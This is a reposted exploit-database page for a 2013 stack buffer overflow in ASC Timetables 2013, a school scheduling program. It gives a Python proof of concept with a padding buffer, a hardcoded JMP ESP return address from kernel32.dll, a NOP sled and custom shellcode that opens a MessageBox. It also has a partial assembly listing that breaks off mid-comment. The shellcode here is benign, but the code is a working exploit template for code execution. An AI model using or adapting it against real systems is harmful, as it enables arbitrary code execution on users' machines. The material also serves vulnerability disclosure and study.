ASC Timetables 2013 - Stack Buffer Overflow Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

ASC Timetables 2013 - Stack Buffer Overflow Vulnerability

来源：http://itsecurity.ma 作者：Dark-Puzzle 发布时间：2013-06-24

#!/usr/bin/python

# Title : ASC Timetables 2013 - Stack Buffer Overflow Vulnerability

# Researcher : Souhail Hammou (Dark-Puzzle)

# Research Team : http://itsecurity.ma

# Facebook : http://www.facebook.com/dark.puzzle.sec

# Date : 22/06/2013

# Download Website : www.asctimetables.com/download_en.html

##########################################################

# Software Details :

# ASC timetables is a school scheduling software used widely by many schools around the globe to generate unique timetables for students.

# it has the features to add school subjects , teachers and manipulate time.

# Vulnerability details :

# The buffer overflow vulnerability resides in the Add subject functionality, and it's triggered when the user will submit a large string when specifying the

#school subject name. To trigger the vulnerability go to the main menu , select subjects , click new then generate a string with the code below and the

#software will execute the shellcode which will popup a MessageBox.

# Picture : http://oi40.tinypic.com/30rwc2q.jpg

garbage = "D"*512

eip = "\xCB\xC0\x8F\x75" #JMP ESP from kernel32.dll

nopsled = "\x90"*177

shellcode = "\xB8\x23\x58\xA7\x11\x2D\x11\x11\x11\x11\x6A\x14\x50\x50\x33\xC0\x50\xB8\x98\x34\x69\x11\x2D\x11\x11\x11\x11\xFF\xE0"

# I have written this shellcode which will popup a "Yes/No" MessageBox with Title and Message : iteDump

#MOV EAX,11A75823

#SUB EAX,11111111

#PUSH 14

#PUSH EAX

#XOR EAX,EAX